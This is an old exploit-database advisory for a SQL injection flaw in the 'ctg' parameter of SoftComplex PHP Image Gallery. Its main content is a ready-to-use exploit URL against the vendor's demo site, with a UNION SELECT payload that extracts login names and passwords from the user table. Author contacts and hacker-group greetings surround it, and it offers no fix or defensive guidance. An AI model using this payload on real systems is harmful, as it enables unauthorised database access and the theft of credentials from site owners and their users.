SoftComplex PHP Image Gallery - 'ctg' SQL Injection

EDB-ID:

7026


Author:

Hussin X

Type:

webapps


Platform:

PHP

Date:

2008-11-06


SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability
___________________________________

Author:  Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

MaiL :   darkangeL_G85@Yahoo.CoM
___________________________________

script    : http://www.softcomplex.com/products/php_image_gallery/demo2/

_____

ExploiT & demo
_____________

http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show




____________________________( Greetz )_________________________________
|
|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
|_____________________________________________________________________


                   Im IRAQi    |    Im TrYaGi

# milw0rm.com [2008-11-06]